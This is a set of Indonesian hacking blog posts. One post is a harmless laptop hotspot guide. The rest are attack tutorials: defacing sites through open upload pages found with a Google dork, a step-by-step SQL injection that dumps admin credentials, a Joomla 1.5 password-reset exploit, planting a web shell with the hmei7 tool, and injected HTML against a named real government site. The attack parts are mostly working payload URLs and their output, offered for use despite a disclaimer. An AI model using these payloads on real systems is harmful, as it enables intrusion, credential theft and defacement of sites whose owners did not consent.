Deface Mudah aLa CUPU Lutfi rahman rwxr-xr-x 0 10.52

Filename	Deface Mudah aLa CUPU
Permission	rw-r--r--
Author	Lutfi rahman
Date and Time	10.52
Label
Action

Deface Mudah aLa CUPU

Assalamualaikum,,

sebeLum nya apa kabar Semuah,,,udah lama gak On Line,,dan Akhir nya saya buat TutoriaL ini..!!
kaLi ini saya mau kasih TutoriaL Deface Web aLa CUPU,,simpLe dan aktraktis Bro..

okeh Langsung ajah Ya:

1. Pertama buka google.com
2. ketikan atau copas aja dork di bawah ini :

inurl:examples/uploadbutton.html

3. klik enter, pilih salah satu situs yang ada
4. klik tulisan Upload
5. UpLoad fiLe html deface anda,,,
6. ntar muncul tulisan di kotak yang persegi panjang ( trus Copy )
7. lalu ( Paste ) pastekan di belakang alamat situs tersebut misalkan

www.target.com/examples/uploadbutton.html Jadi www.target.com/kata yang ada di dalam kotak persegi panjang tadi

Okeh Sekian duLu Ya and Happy Defacing,,,

Membuat Hotspot Dengan Wireless Laptop Sendiri Lutfi rahman rwxr-xr-x 0 23.57

Filename	Membuat Hotspot Dengan Wireless Laptop Sendiri
Permission	rw-r--r--
Author	Lutfi rahman
Date and Time	23.57
Label
Action

maaf newbie ijin buat thread dolo....
walaupun mungkin sudah banyak yang tau tapi ta' apalah sekedar mengingatkan kembali buat yg udah lupa dan sebagai ilmu tambahan buat yg belum tauu Culas

ekeke maaf buat intro yang gak penting baget..to the point aja yaa Cheer

Cara membuat sharing internet dengan menggunakan wireless atau bahasa gaulnya membuat hotspot kecil-kecilan dengan menggunakan wireless laptop.

Caranya cukup mudah dan gampang, sehingga mudah dipraktekkan. Oiya dengan cara ini, kita juga bisa maen game multiplayer, Tapi susahnya, ini berlaku hanya untuk sobat yang punya laptop, atau USB wirelless, kalo gak punya, yaa gak bisa konek dunk.

Lanjut…. caranya adalah sebagai berikut:

1. Pastikan sampeyan sudah konek internet via LAN atau modem, terserahlah yang penting koneksi internetnya gak menggunakan wireless. Kecuali kalo sampeyan punya 2 wireless.

2. Kalo yakin sudah konek, dan mau membaginya sama temen-temen silahken sobat aktifkan wireless-nya dulu.

3. Setelah itu buka control panel dan masuk ke network connections.

4. Kemudian klik kanan di wireless punya sampeyan, pilih properties kemudian pilih tab wireless network. Setelah itu centang kotak use windows to configure my wireless network setting.

5. Selanjutnya klik tombol add, pada kotak network name (SSID) isi terserah sampeyan, kalo punya saya saya isi dengan KatsukiDaito hotspot.

6. Centang pada kotak yang disampingnya ada tulisan connect even if this network is not broadcasting. Untuk network authentication pilih open, Data Encryption pilih WEP, dan hilangkan centang pada the key is provided for me automatically. Kemudian pada network key isi dengan password terserah anda, default isilah dengan angka 12345. Klik Oke.

7. Setelah selesai, pada koneksi internet sampeyan yang jalan (Entah LAN atau modem, pokoknya yang udah jalan lah) koneksinya mesti disharing Sekarang saya asumsikan sampeyan make LAN. Caranya klik kanan pada LAN yang telah tersambung internet tadi, pilih properties, kemudian pilih tab advanced kemudian centang pada kotak yang di sampingnya ada tulisan allow other network users to connect through this computers internet connection. Klik Oke dan restart PC/Laptop sampeyan.

8. Setelah direstart, sekarang konekkan lagi internetnya.

9. Kemudian buka available wireless networks, coba liat ada gak tulisan KatsukiDaito hotspot? Kalo ada coba konekkan, dan tunggu. Sekarang coba temen sampeyan jua menkonekkannya ke KatsukiDaito hotspot tersebut. Jangan lupa suruh temen sobat pake password 12345. Hehehehehe Kalo udah konek silahken cek…

10. InsyaAllah berhasil

Tutorial SQL Injection Step by Step Lutfi rahman rwxr-xr-x 0 23.30

Filename	Tutorial SQL Injection Step by Step
Permission	rw-r--r--
Author	Lutfi rahman
Date and Time	23.30
Label
Action

Trik lama namun apa salahnya saya Posting bagi yang belum tau :D

Sebelum men daface sebuah situs, kita bisa menggunakan "dork Sql Injection" dengan bantuan om kita semua ( om google )

Code:

inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"

trus yg saya dapat :

Code:

http://www.victim.com/detailproduct.php?id=75

untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang url

Code:

http://www.victim.com/detailproduct.php?id=75'

ternyata ada bug-nya, muncul pesan error :

Code:

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1

Untuk mencari column gunakan perintah [ order by ]

Code:

http://www.victim.com/detailproduct.php?id=75 order by 1--

dimulai dengan angka 1, selanjutnya 2, dst sampai muncul pesan error

pada target kita kali ini, error muncul pada angka 19

Code:

http://www.victim.com/detailproduct.php?id=75 order by 19--

muncul pesan error:
Unknown column '19' in 'order clause'

jadi angka yang diambil adalah 19-1 = 18 (jumlah column adalah 18)

Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah "union all select"

Code:

http://www.victim.com/detailproduct.php?id=-75 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 75

akan muncul "angka ajaib" : 3, 11 dan 18
kita pilih salah satunya saja, misal 3

trus kita cari versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 3

Code:

http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

muncul tulisan :
5.0.90-community
wewww...ternyata versi 5, klo versi 4 sy angkat tangan.....wkwkwkwk :p
nb : lebih mudah versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema,
dimana information_schema tidak terdapat pada database MySql versi 4. Jadi kalau targetnya mempunyai database MySQL versi 4,
yang kita lakukan yaitu menebak-nebak tablenya... lol

Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib
dan "+from+information_schema.tables+where+table_schema=database()--" di belakang angka 18

Code:

http://www.victim.com/detailproduct.php?id=-75 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where table_schema=database()--

akan muncul nama-nama table :

Code:

login,tbanner,tcatprod,tproduct,tset

Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,
kali ini kita ambil table "login"
sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :
http://cyber4rt.com/~converter
ketik : login
pilih ASCII to Hex
hasilnya : 6c6f67696e

Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 3 dan "+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL

ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
ke hexa

Code:

http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+info
rmation_schema.columns+where+table_name=0x6c6f67696e--

muncul column : user,pass

untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 3 dan +from+NAMATABLE-- pada akhir URL

ganti column 1 dengan "user" dan column2 dengan "pass"
0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa
NAMA TABLE diganti dengan "login" untuk mengambil informasi dari table yang bernama "login"

Code:

http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,group_concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login--

hasil : admin:admin
jadi,
user = admin
password = admin
nb : Jika ada yang mendapatkan password yang berupa MD5 seperti "21232f297a57a5a743894a0e4a801fc3" atau yang lainnya, silahkan anda hash di sini http://hashchecker.de/find.html

Selesai ??? belum....wkwkwkwk :p
Langkah selanjutnya adalah mencari Admin Page target kita. Anda bisa menggunakan "adminfinder" atau "scanlink.py"
download di mari : http://www.ziddu.com/download/10386415/InstantSQLI.rar.html

Klo ada yg dapat admin pagenya... tolong jangan di deface, ini hanya untuk pembelajaran saja.

Sumber: acizninja

Exploit Web Joomla V1.5 Lutfi rahman rwxr-xr-x 0 23.24

Filename	Exploit Web Joomla V1.5
Permission	rw-r--r--
Author	Lutfi rahman
Date and Time	23.24
Label
Action

Exploit Web Joomla V1.5

oke, yang kita cari disini adalah joomla versi 1.5
dork yang dipake yaitu option=com_user
nanti kalau sudah dapat target, misalkan targetnya adalah :

http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_u...w=register
atau
http://target.com/index.php?option=com_user&view=login
atau
http://target.com/index.php?option=com_user&view=remind

maka yang harus dilakukan adalah mengganti view dengan mengganti view=reset dan layout=confirm
jadi contohnya adalah :
http://target.com/index.php?option=com_u...ut=confirm

nah... dari situ nantinya akan keluar form token, ngga perlu bingung kalo ngga tau harus input apa,
tinggal masukin kutip satu (') , kalau web tersebut belom di patch, maka akan masuk kedalam menu reset password

tinggal masukin aja deh password yang diinginkan, beres.

oke, tahap selanjutnya adalah dengan masuk kedalam menu administrator, misalkanhttp://target.com/administrator

nah, tinggal masukin deh username "admin" atau "administrator" dan password dengan password yang barusan diganti tadi.
selesai.

gampang kan ?
ayo, majukan kemampuan hacker indonesia !!!

SAYA TIDAK MENGAJARKAN ANDA HARUS MELAKUKAN KEJAHATAN, NAMUN SAYA HANYA MEMBERIKAN ILMU UNTUK SEBUAH INFORMASI YANG ANDA KETAHUI "DILARANG KERAS MENYALAH GUNAKAN TUTORIAL INI"

DEFACE WEB MENGGUNAKAN TOOL Lutfi rahman rwxr-xr-x 0 23.13

Filename	DEFACE WEB MENGGUNAKAN TOOL
Permission	rw-r--r--
Author	Lutfi rahman
Date and Time	23.13
Label
Action

kaLi eneh ane mau share Seputar Deface WEB yg paLing simpLe dgn Menggunakan TooLz si mastah hmei7...!!

Wkwkwkwkwkwk
yah itu dia BACKDOOR yang sudah di tanam oleh hmei7 <--- hebat ane salut ama ente !! zone-h pula :* ( Maho

ane

)
oke ane kasih atau enggak yah?? sopwarenya >.<
kasih dah atas persetujuan mereka
linknya download disini

cara memakai silahkan extract terlebih dahulu
nanti muncul sopwarenya

SPOILER: HIDE

cara pakainya.
jalankan aplikasi itu hmei7 tool
Setelah jalan
Step 1 :

SPOILER: HIDE

klik web dav ---> asp shell maker
Step 2 :

SPOILER: HIDE

Step3 :
anu anu :menyukai anu anda maksudya itu loh kita tanam shell buatan sendiri wait wait
nih SSnyo

SPOILER: HIDE

Step4
nah tau kan load file shell from .... cari sendiri ah ogah :cape: kalian yang deface itu contohnya justinisal.html
pokonya terserah rename jadi apa kek yang /Hmei7.asp;.txt jadi hacke.html atau maho.html atau Indonesia.html terserahlah!!.

Step 5 ayo ayo kita nyari target hasil nyolong dari para defacer yang pake tools backdoornya hmei7 ayo Huwaa

carinya di salah satu userhttp://www.indonesiandefacer.org/
siapa aja boleh ane mintanya ke siapa yah?
Step 6

SPOILER: HIDE

menuju is-rookit lagi baru ke add sitehttp://soft.tzyz.net/0x0.txt hapus jadihttp://soft.tzyz.net
Click oke dan terus click serang sampai ada tulisan your shell is created http://soft.tzyz.net/0x0.html

Selesai sudah menuju link kalian deh wakaka

keren yah :P
tergantung kalau udah di patch ga akan bisa soalnya udah di hapus sama admin site tersebut

Tutorial Attack XSS Lutfi rahman rwxr-xr-x 0 08.38

Filename	Tutorial Attack XSS
Permission	rw-r--r--
Author	Lutfi rahman
Date and Time	08.38
Label
Action

halo all :) kali ini flazer mau kasih trik / toturial Deface Palsu via SQL Injection ???
wiihh emang nya bisa ya hmmm ini sih seperti xss saja :D
jadi kita bermain dengan sql injection dulu :)
ok langsung aja ya ^_^
1. siapkan target sql kita dulu ^_^
udah tau kan sql itu gimana ??? kalau gk tau google aja gan
nah sekarang kita dapat target neh :D
http://dinhubkominfo.jatengprov.go.id/?v=nw&id=54

ok kita coba sql ya gan
http://dinhubkominfo.jatengprov.go.id/?v=nw&id=-54%20union%20select%201,2,3,4,5,6,7,8,9,10--

wahh ternyata ada no togel nya gan heheheh :P
sekarang kita ganti yang no 6 dengan asci kita ^_^
tahu kan convert asci nya ?? http://www.swingnote.com/tools/texttohex.php

ok sekarang kita coba buat kata ini <h1>Saya Hanya Seorang Lamer I AM NOT HACKER</h1>
nah yang dari <h1> sampai akhir kita coba convert ke asci ^_^ nah kalau sudah kita ambil hex nya jadi nya seperi ini